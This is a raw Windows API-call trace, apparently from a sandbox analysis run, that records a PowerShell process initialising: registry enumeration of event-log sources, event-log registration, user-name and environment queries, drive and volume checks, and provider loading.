	[0210.351] RegQueryInfoKeyW (in: hKey=0x348, lpClass=0x0, lpcchClass=0x0, lpReserved=0x0, lpcSubKeys=0x27d02c, lpcbMaxSubKeyLen=0x0, lpcbMaxClassLen=0x0, lpcValues=0x27d028, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0 | out: lpClass=0x0, lpcchClass=0x0, lpcSubKeys=0x27d02c*=0x9, lpcbMaxSubKeyLen=0x0, lpcbMaxClassLen=0x0, lpcValues=0x27d028*=0x10, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0210.351] CoTaskMemFree (pv=0x0) 
	[0210.351] CoTaskMemAlloc (cb=0x204) returned 0xe5880
	[0210.351] RegEnumKeyExW (in: hKey=0x348, dwIndex=0x0, lpName=0xe5880, lpcchName=0x27d0b8, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Application", lpcchName=0x27d0b8, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0210.351] CoTaskMemFree (pv=0xe5880) 
	[0210.351] CoTaskMemFree (pv=0x0) 
	[0210.351] CoTaskMemAlloc (cb=0x204) returned 0xe5880
	[0210.351] RegEnumKeyExW (in: hKey=0x348, dwIndex=0x1, lpName=0xe5880, lpcchName=0x27d0b8, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="HardwareEvents", lpcchName=0x27d0b8, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0210.351] CoTaskMemFree (pv=0xe5880) 
	[0210.352] CoTaskMemFree (pv=0x0) 
	[0210.352] CoTaskMemAlloc (cb=0x204) returned 0xe5880
	[0210.352] RegEnumKeyExW (in: hKey=0x348, dwIndex=0x2, lpName=0xe5880, lpcchName=0x27d0b8, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Internet Explorer", lpcchName=0x27d0b8, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0210.352] CoTaskMemFree (pv=0xe5880) 
	[0210.352] CoTaskMemFree (pv=0x0) 
	[0210.352] CoTaskMemAlloc (cb=0x204) returned 0xe5880
	[0210.352] RegEnumKeyExW (in: hKey=0x348, dwIndex=0x3, lpName=0xe5880, lpcchName=0x27d0b8, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Key Management Service", lpcchName=0x27d0b8, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0210.352] CoTaskMemFree (pv=0xe5880) 
	[0210.352] CoTaskMemFree (pv=0x0) 
	[0210.352] CoTaskMemAlloc (cb=0x204) returned 0xe5880
	[0210.352] RegEnumKeyExW (in: hKey=0x348, dwIndex=0x4, lpName=0xe5880, lpcchName=0x27d0b8, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Media Center", lpcchName=0x27d0b8, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0210.352] CoTaskMemFree (pv=0xe5880) 
	[0210.352] CoTaskMemFree (pv=0x0) 
	[0210.352] CoTaskMemAlloc (cb=0x204) returned 0xe5880
	[0210.352] RegEnumKeyExW (in: hKey=0x348, dwIndex=0x5, lpName=0xe5880, lpcchName=0x27d0b8, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="OAlerts", lpcchName=0x27d0b8, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0210.352] CoTaskMemFree (pv=0xe5880) 
	[0210.352] CoTaskMemFree (pv=0x0) 
	[0210.352] CoTaskMemAlloc (cb=0x204) returned 0xe5880
	[0210.352] RegEnumKeyExW (in: hKey=0x348, dwIndex=0x6, lpName=0xe5880, lpcchName=0x27d0b8, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Security", lpcchName=0x27d0b8, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0210.352] CoTaskMemFree (pv=0xe5880) 
	[0210.352] CoTaskMemFree (pv=0x0) 
	[0210.352] CoTaskMemAlloc (cb=0x204) returned 0xe5880
	[0210.352] RegEnumKeyExW (in: hKey=0x348, dwIndex=0x7, lpName=0xe5880, lpcchName=0x27d0b8, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="System", lpcchName=0x27d0b8, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0210.352] CoTaskMemFree (pv=0xe5880) 
	[0210.352] CoTaskMemFree (pv=0x0) 
	[0210.352] CoTaskMemAlloc (cb=0x204) returned 0xe5880
	[0210.352] RegEnumKeyExW (in: hKey=0x348, dwIndex=0x8, lpName=0xe5880, lpcchName=0x27d0b8, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Windows PowerShell", lpcchName=0x27d0b8, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0210.352] CoTaskMemFree (pv=0xe5880) 
	[0210.352] CoTaskMemFree (pv=0x0) 
	[0210.352] RegOpenKeyExW (in: hKey=0x348, lpSubKey="Application", ulOptions=0x0, samDesired=0x20019, phkResult=0x27d118 | out: phkResult=0x27d118*=0x368) returned 0x0
	[0210.353] RegOpenKeyExW (in: hKey=0x368, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x27d118 | out: phkResult=0x27d118*=0x0) returned 0x2
	[0210.353] RegOpenKeyExW (in: hKey=0x348, lpSubKey="HardwareEvents", ulOptions=0x0, samDesired=0x20019, phkResult=0x27d118 | out: phkResult=0x27d118*=0x2e4) returned 0x0
	[0210.353] RegOpenKeyExW (in: hKey=0x2e4, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x27d118 | out: phkResult=0x27d118*=0x0) returned 0x2
	[0210.353] RegOpenKeyExW (in: hKey=0x348, lpSubKey="Internet Explorer", ulOptions=0x0, samDesired=0x20019, phkResult=0x27d118 | out: phkResult=0x27d118*=0x1d0) returned 0x0
	[0210.353] RegOpenKeyExW (in: hKey=0x1d0, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x27d118 | out: phkResult=0x27d118*=0x0) returned 0x2
	[0210.353] RegOpenKeyExW (in: hKey=0x348, lpSubKey="Key Management Service", ulOptions=0x0, samDesired=0x20019, phkResult=0x27d118 | out: phkResult=0x27d118*=0x36c) returned 0x0
	[0210.353] RegOpenKeyExW (in: hKey=0x36c, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x27d118 | out: phkResult=0x27d118*=0x0) returned 0x2
	[0210.353] RegOpenKeyExW (in: hKey=0x348, lpSubKey="Media Center", ulOptions=0x0, samDesired=0x20019, phkResult=0x27d118 | out: phkResult=0x27d118*=0x30c) returned 0x0
	[0210.353] RegOpenKeyExW (in: hKey=0x30c, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x27d118 | out: phkResult=0x27d118*=0x0) returned 0x2
	[0210.353] RegOpenKeyExW (in: hKey=0x348, lpSubKey="OAlerts", ulOptions=0x0, samDesired=0x20019, phkResult=0x27d118 | out: phkResult=0x27d118*=0x320) returned 0x0
	[0210.353] RegOpenKeyExW (in: hKey=0x320, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x27d118 | out: phkResult=0x27d118*=0x0) returned 0x2
	[0210.353] RegOpenKeyExW (in: hKey=0x348, lpSubKey="Security", ulOptions=0x0, samDesired=0x20019, phkResult=0x27d118 | out: phkResult=0x27d118*=0x0) returned 0x5
	[0210.363] RegOpenKeyExW (in: hKey=0x348, lpSubKey="System", ulOptions=0x0, samDesired=0x20019, phkResult=0x27d118 | out: phkResult=0x27d118*=0x32c) returned 0x0
	[0210.363] RegOpenKeyExW (in: hKey=0x32c, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x27d118 | out: phkResult=0x27d118*=0x0) returned 0x2
	[0210.364] RegOpenKeyExW (in: hKey=0x348, lpSubKey="Windows PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x27d118 | out: phkResult=0x27d118*=0x330) returned 0x0
	[0210.364] RegOpenKeyExW (in: hKey=0x330, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x27d118 | out: phkResult=0x27d118*=0x334) returned 0x0
	[0210.364] RegCloseKey (hKey=0x334) returned 0x0
	[0210.364] RegCloseKey (hKey=0x348) returned 0x0
	[0210.364] RegCloseKey (hKey=0x330) returned 0x0
	[0210.370] RegisterEventSourceW (lpUNCServerName=".", lpSourceName="PowerShell") returned 0x1b9f0008
	[0210.558] ReportEventW (hEventLog=0x1b9f0008, wType=0x4, wCategory=0x6, dwEventID=0x258, lpUserSid=0x0, wNumStrings=0x3, dwDataSize=0x0, lpStrings=0x2ec2008*="WSMan", lpRawData=0x2ec1d78) returned 1
	[0210.559] CoTaskMemAlloc (cb=0x104) returned 0x18fd40
	[0210.559] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x18fd40, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0210.559] CoTaskMemFree (pv=0x18fd40) 
	[0210.560] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x27cc50, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0210.560] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x27cba0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0210.560] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x27cba0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0210.561] CoTaskMemAlloc (cb=0x804) returned 0x1b86daf0
	[0210.561] GetUserNameExW (in: NameFormat=0x2, lpNameBuffer=0x1b86daf0, nSize=0x27d3a8 | out: lpNameBuffer="YKYD69Q\\aETAdzjz", nSize=0x27d3a8) returned 0x1
	[0210.561] CoTaskMemFree (pv=0x1b86daf0) 
	[0210.561] CoTaskMemAlloc (cb=0x204) returned 0xe5880
	[0210.561] GetUserNameW (in: lpBuffer=0xe5880, pcbBuffer=0x27d3e8 | out: lpBuffer="aETAdzjz", pcbBuffer=0x27d3e8) returned 1
	[0210.562] CoTaskMemFree (pv=0xe5880) 
	[0210.562] ReportEventW (hEventLog=0x1b9f0008, wType=0x4, wCategory=0x6, dwEventID=0x258, lpUserSid=0x0, wNumStrings=0x3, dwDataSize=0x0, lpStrings=0x2ec7998*="Alias", lpRawData=0x2ec7728) returned 1
	[0210.563] CoTaskMemAlloc (cb=0x104) returned 0x18fd40
	[0210.563] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x18fd40, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0210.563] CoTaskMemFree (pv=0x18fd40) 
	[0210.564] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x27cc50, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0210.564] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x27cba0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0210.565] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x27cba0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0210.565] CoTaskMemAlloc (cb=0x804) returned 0x1b86daf0
	[0210.565] GetUserNameExW (in: NameFormat=0x2, lpNameBuffer=0x1b86daf0, nSize=0x27d3a8 | out: lpNameBuffer="YKYD69Q\\aETAdzjz", nSize=0x27d3a8) returned 0x1
	[0210.565] CoTaskMemFree (pv=0x1b86daf0) 
	[0210.565] CoTaskMemAlloc (cb=0x204) returned 0xe5880
	[0210.565] GetUserNameW (in: lpBuffer=0xe5880, pcbBuffer=0x27d3e8 | out: lpBuffer="aETAdzjz", pcbBuffer=0x27d3e8) returned 1
	[0210.565] CoTaskMemFree (pv=0xe5880) 
	[0210.566] ReportEventW (hEventLog=0x1b9f0008, wType=0x4, wCategory=0x6, dwEventID=0x258, lpUserSid=0x0, wNumStrings=0x3, dwDataSize=0x0, lpStrings=0x2eccf40*="Environment", lpRawData=0x2ecccd0) returned 1
	[0210.567] CoTaskMemAlloc (cb=0x104) returned 0x18fd40
	[0210.567] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x18fd40, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0210.567] CoTaskMemFree (pv=0x18fd40) 
	[0210.568] CoTaskMemAlloc (cb=0x104) returned 0x18fd40
	[0210.568] GetEnvironmentVariableW (in: lpName="HOMEDRIVE", lpBuffer=0x18fd40, nSize=0x80 | out: lpBuffer="C:") returned 0x2
	[0210.568] CoTaskMemFree (pv=0x18fd40) 
	[0210.568] CoTaskMemAlloc (cb=0x104) returned 0x18fd40
	[0210.568] GetEnvironmentVariableW (in: lpName="HOMEPATH", lpBuffer=0x18fd40, nSize=0x80 | out: lpBuffer="\\Users\\aETAdzjz") returned 0xf
	[0210.568] CoTaskMemFree (pv=0x18fd40) 
	[0210.568] GetFullPathNameW (in: lpFileName="C:\\Users\\aETAdzjz", nBufferLength=0x105, lpBuffer=0x27cf50, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\aETAdzjz", lpFilePart=0x0) returned 0x11
	[0210.568] SetErrorMode (uMode=0x1) returned 0x1
	[0210.569] GetFileAttributesExW (in: lpFileName="C:\\Users\\aETAdzjz" (normalized: "c:\\users\\aetadzjz"), fInfoLevelId=0x0, lpFileInformation=0x27d160 | out: lpFileInformation=0x27d160*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x2329edc0, ftCreationTime.dwHighDateTime=0x1d2f180, ftLastAccessTime.dwLowDateTime=0x7d929a80, ftLastAccessTime.dwHighDateTime=0x1d2f182, ftLastWriteTime.dwLowDateTime=0x7d929a80, ftLastWriteTime.dwHighDateTime=0x1d2f182, nFileSizeHigh=0x0, nFileSizeLow=0x2000)) returned 1
	[0210.569] SetErrorMode (uMode=0x1) returned 0x1
	[0210.570] GetLogicalDrives () returned 0x4
	[0210.570] GetFullPathNameW (in: lpFileName="C:\\.", nBufferLength=0x105, lpBuffer=0x27ccc0, lpFilePart=0x0 | out: lpBuffer="C:\\", lpFilePart=0x0) returned 0x3
	[0210.571] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3
	[0210.572] SetErrorMode (uMode=0x1) returned 0x1
	[0210.572] CoTaskMemAlloc (cb=0x68) returned 0x1b84d020
	[0210.572] CoTaskMemAlloc (cb=0x68) returned 0x1b84d090
	[0210.572] GetVolumeInformationW (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x1b84d020, nVolumeNameSize=0x32, lpVolumeSerialNumber=0x27d130, lpMaximumComponentLength=0x27d12c, lpFileSystemFlags=0x27d128, lpFileSystemNameBuffer=0x1b84d090, nFileSystemNameSize=0x32 | out: lpVolumeNameBuffer="SYSTEM", lpVolumeSerialNumber=0x27d130*=0x705ba84c, lpMaximumComponentLength=0x27d12c*=0xff, lpFileSystemFlags=0x27d128*=0x3e700ff, lpFileSystemNameBuffer="NTFS") returned 1
	[0210.573] CoTaskMemFree (pv=0x1b84d020) 
	[0210.573] CoTaskMemFree (pv=0x1b84d090) 
	[0210.573] SetErrorMode (uMode=0x1) returned 0x1
	[0210.573] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3
	[0210.574] GetFullPathNameW (in: lpFileName="C:\\", nBufferLength=0x105, lpBuffer=0x27ce70, lpFilePart=0x0 | out: lpBuffer="C:\\", lpFilePart=0x0) returned 0x3
	[0210.574] SetErrorMode (uMode=0x1) returned 0x1
	[0210.574] GetFileAttributesExW (in: lpFileName="C:\\" (normalized: "c:"), fInfoLevelId=0x0, lpFileInformation=0x27d0d0 | out: lpFileInformation=0x27d0d0*(dwFileAttributes=0x16, ftCreationTime.dwLowDateTime=0x3c0142d0, ftCreationTime.dwHighDateTime=0x1ca042c, ftLastAccessTime.dwLowDateTime=0x6cd47e0, ftLastAccessTime.dwHighDateTime=0x1d337b1, ftLastWriteTime.dwLowDateTime=0x6cd47e0, ftLastWriteTime.dwHighDateTime=0x1d337b1, nFileSizeHigh=0x0, nFileSizeLow=0x2000)) returned 1
	[0210.574] SetErrorMode (uMode=0x1) returned 0x1
	[0210.574] GetFullPathNameW (in: lpFileName="C:\\", nBufferLength=0x105, lpBuffer=0x27ce70, lpFilePart=0x0 | out: lpBuffer="C:\\", lpFilePart=0x0) returned 0x3
	[0210.574] GetFullPathNameW (in: lpFileName="C:\\.", nBufferLength=0x105, lpBuffer=0x27cd20, lpFilePart=0x0 | out: lpBuffer="C:\\", lpFilePart=0x0) returned 0x3
	[0210.574] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3
	[0210.575] GetFullPathNameW (in: lpFileName="C:\\.", nBufferLength=0x105, lpBuffer=0x27cc50, lpFilePart=0x0 | out: lpBuffer="C:\\", lpFilePart=0x0) returned 0x3
	[0210.575] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3
	[0210.575] GetFullPathNameW (in: lpFileName="C:\\", nBufferLength=0x105, lpBuffer=0x27cca0, lpFilePart=0x0 | out: lpBuffer="C:\\", lpFilePart=0x0) returned 0x3
	[0210.575] SetErrorMode (uMode=0x1) returned 0x1
	[0210.575] GetFileAttributesExW (in: lpFileName="C:\\" (normalized: "c:"), fInfoLevelId=0x0, lpFileInformation=0x27cf00 | out: lpFileInformation=0x27cf00*(dwFileAttributes=0x16, ftCreationTime.dwLowDateTime=0x3c0142d0, ftCreationTime.dwHighDateTime=0x1ca042c, ftLastAccessTime.dwLowDateTime=0x6cd47e0, ftLastAccessTime.dwHighDateTime=0x1d337b1, ftLastWriteTime.dwLowDateTime=0x6cd47e0, ftLastWriteTime.dwHighDateTime=0x1d337b1, nFileSizeHigh=0x0, nFileSizeLow=0x2000)) returned 1
	[0210.576] SetErrorMode (uMode=0x1) returned 0x1
	[0210.576] GetFullPathNameW (in: lpFileName="C:\\", nBufferLength=0x105, lpBuffer=0x27cca0, lpFilePart=0x0 | out: lpBuffer="C:\\", lpFilePart=0x0) returned 0x3
	[0210.576] SetErrorMode (uMode=0x1) returned 0x1
	[0210.576] GetFileAttributesExW (in: lpFileName="C:\\" (normalized: "c:"), fInfoLevelId=0x0, lpFileInformation=0x27cf00 | out: lpFileInformation=0x27cf00*(dwFileAttributes=0x16, ftCreationTime.dwLowDateTime=0x3c0142d0, ftCreationTime.dwHighDateTime=0x1ca042c, ftLastAccessTime.dwLowDateTime=0x6cd47e0, ftLastAccessTime.dwHighDateTime=0x1d337b1, ftLastWriteTime.dwLowDateTime=0x6cd47e0, ftLastWriteTime.dwHighDateTime=0x1d337b1, nFileSizeHigh=0x0, nFileSizeLow=0x2000)) returned 1
	[0210.576] SetErrorMode (uMode=0x1) returned 0x1
	[0210.576] GetFullPathNameW (in: lpFileName="C:\\", nBufferLength=0x105, lpBuffer=0x27cd40, lpFilePart=0x0 | out: lpBuffer="C:\\", lpFilePart=0x0) returned 0x3
	[0210.576] SetErrorMode (uMode=0x1) returned 0x1
	[0210.576] GetFileAttributesExW (in: lpFileName="C:\\" (normalized: "c:"), fInfoLevelId=0x0, lpFileInformation=0x27cfa0 | out: lpFileInformation=0x27cfa0*(dwFileAttributes=0x16, ftCreationTime.dwLowDateTime=0x3c0142d0, ftCreationTime.dwHighDateTime=0x1ca042c, ftLastAccessTime.dwLowDateTime=0x6cd47e0, ftLastAccessTime.dwHighDateTime=0x1d337b1, ftLastWriteTime.dwLowDateTime=0x6cd47e0, ftLastWriteTime.dwHighDateTime=0x1d337b1, nFileSizeHigh=0x0, nFileSizeLow=0x2000)) returned 1
	[0210.576] SetErrorMode (uMode=0x1) returned 0x1
	[0210.576] CoTaskMemAlloc (cb=0x804) returned 0x1b86daf0
	[0210.577] GetUserNameExW (in: NameFormat=0x2, lpNameBuffer=0x1b86daf0, nSize=0x27d3a8 | out: lpNameBuffer="YKYD69Q\\aETAdzjz", nSize=0x27d3a8) returned 0x1
	[0210.577] CoTaskMemFree (pv=0x1b86daf0) 
	[0210.577] CoTaskMemAlloc (cb=0x204) returned 0xe5880
	[0210.577] GetUserNameW (in: lpBuffer=0xe5880, pcbBuffer=0x27d3e8 | out: lpBuffer="aETAdzjz", pcbBuffer=0x27d3e8) returned 1
	[0210.577] CoTaskMemFree (pv=0xe5880) 
	[0210.577] ReportEventW (hEventLog=0x1b9f0008, wType=0x4, wCategory=0x6, dwEventID=0x258, lpUserSid=0x0, wNumStrings=0x3, dwDataSize=0x0, lpStrings=0x2ed3f98*="FileSystem", lpRawData=0x2ed3d28) returned 1
	[0210.578] CoTaskMemAlloc (cb=0x104) returned 0x18fd40
	[0210.578] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x18fd40, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0210.578] CoTaskMemFree (pv=0x18fd40) 
	[0210.579] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x27cc80, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0210.580] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x27cbd0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0210.580] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x27cbd0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0210.580] CoTaskMemAlloc (cb=0x804) returned 0x1b86daf0
	[0210.580] GetUserNameExW (in: NameFormat=0x2, lpNameBuffer=0x1b86daf0, nSize=0x27d3a8 | out: lpNameBuffer="YKYD69Q\\aETAdzjz", nSize=0x27d3a8) returned 0x1
	[0210.580] CoTaskMemFree (pv=0x1b86daf0) 
	[0210.580] CoTaskMemAlloc (cb=0x204) returned 0xe5880
	[0210.580] GetUserNameW (in: lpBuffer=0xe5880, pcbBuffer=0x27d3e8 | out: lpBuffer="aETAdzjz", pcbBuffer=0x27d3e8) returned 1
	[0210.580] CoTaskMemFree (pv=0xe5880) 
	[0210.581] ReportEventW (hEventLog=0x1b9f0008, wType=0x4, wCategory=0x6, dwEventID=0x258, lpUserSid=0x0, wNumStrings=0x3, dwDataSize=0x0, lpStrings=0x2ed9788*="Function", lpRawData=0x2ed9518) returned 1
	[0210.584] CoTaskMemAlloc (cb=0x104) returned 0x18fd40
	[0210.584] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x18fd40, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0210.584] CoTaskMemFree (pv=0x18fd40) 
	[0210.590] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x27cc50, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0210.590] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x27cba0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0210.590] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x27cba0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0210.590] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x27cba0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0215.476] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x27cc50, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0215.476] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x27cba0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0215.476] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x27cba0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0215.478] CoTaskMemAlloc (cb=0x804) returned 0x1b86daf0
	[0215.478] GetUserNameExW (in: NameFormat=0x2, lpNameBuffer=0x1b86daf0, nSize=0x27d3a8 | out: lpNameBuffer="YKYD69Q\\aETAdzjz", nSize=0x27d3a8) returned 0x1
	[0215.479] CoTaskMemFree (pv=0x1b86daf0) 
	[0215.479] CoTaskMemAlloc (cb=0x204) returned 0xe5880
	[0215.479] GetUserNameW (in: lpBuffer=0xe5880, pcbBuffer=0x27d3e8 | out: lpBuffer="aETAdzjz", pcbBuffer=0x27d3e8) returned 1
	[0215.479] CoTaskMemFree (pv=0xe5880) 
	[0215.479] ReportEventW (hEventLog=0x1b9f0008, wType=0x4, wCategory=0x6, dwEventID=0x258, lpUserSid=0x0, wNumStrings=0x3, dwDataSize=0x0, lpStrings=0x2f0bb10*="Registry", lpRawData=0x2f0b8a0) returned 1
